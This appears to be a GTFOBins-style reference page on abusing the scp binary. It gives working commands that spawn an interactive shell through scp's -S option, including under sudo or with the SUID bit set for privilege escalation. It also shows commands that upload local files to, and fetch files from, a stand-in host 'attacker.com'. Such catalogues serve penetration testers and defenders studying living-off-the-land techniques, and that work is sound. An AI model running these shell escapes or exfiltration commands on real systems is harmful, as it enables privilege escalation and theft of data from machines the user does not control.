.. / scp

Sponsor Fork Star

• Shell
• Upload
• Download

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
  chmod +x /path/to/temp-file
  scp -S /path/to/temp-file . x:

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
  chmod +x /path/to/temp-file
  scp -S /path/to/temp-file . x:

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
  chmod +x /path/to/temp-file
  scp -S /path/to/temp-file . x:

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  scp /path/to/input-file user@attacker.com:/path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  scp /path/to/input-file user@attacker.com:/path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  scp /path/to/input-file user@attacker.com:/path/to/output-file

  Receiver

  An SSH server can be used on the attacker box to receive the data.

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  scp user@attacker.com:/path/to/input-file /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  scp user@attacker.com:/path/to/input-file /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  scp user@attacker.com:/path/to/input-file /path/to/output-file

  Sender

  An SSH server can be used on the attacker box to send the data.

Source | History